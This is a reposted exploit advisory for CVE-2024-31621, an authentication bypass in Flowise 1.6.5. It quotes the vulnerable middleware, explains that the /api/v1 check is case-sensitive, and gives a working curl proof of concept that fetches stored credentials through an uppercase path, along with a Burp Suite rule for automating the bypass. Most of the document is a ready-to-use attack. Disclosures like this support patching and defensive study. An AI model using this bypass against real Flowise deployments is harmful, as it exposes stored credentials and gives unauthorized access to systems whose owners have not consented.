Flowise 1.6.5 Authentication Bypass
2024-4-22 04:32:26 Author: cxsecurity.com(查看原文) 阅读量:5 收藏

# Exploit Title: Flowise 1.6.5 - Authentication Bypass # Date: 17-April-2024 # Exploit Author: Maerifat Majeed # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise/releases # Version: 1.6.5 # Tested on: mac-os # CVE : CVE-2024-31621 The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. The code snippet this.app.use((req, res, next) => { > if (req.url.includes('/api/v1/')) { > whitelistURLs.some((url) => req.url.includes(url)) ? > next() : basicAuthMiddleware(req, res, next) > } else next() > }) puts authentication middleware for all the endpoints with path /api/v1 except a few whitelisted endpoints. But the code does check for the case sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the endpoints to uppercase like /API/V1 can bypass the authentication. *POC:* curl http://localhost:3000/Api/v1/credentials For seamless authentication bypass. Use burpsuite feature Match and replace rules in proxy settings. Add rule Request first line api/v1 ==> API/V1



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024040048
如有侵权请联系:admin#unsafe.sh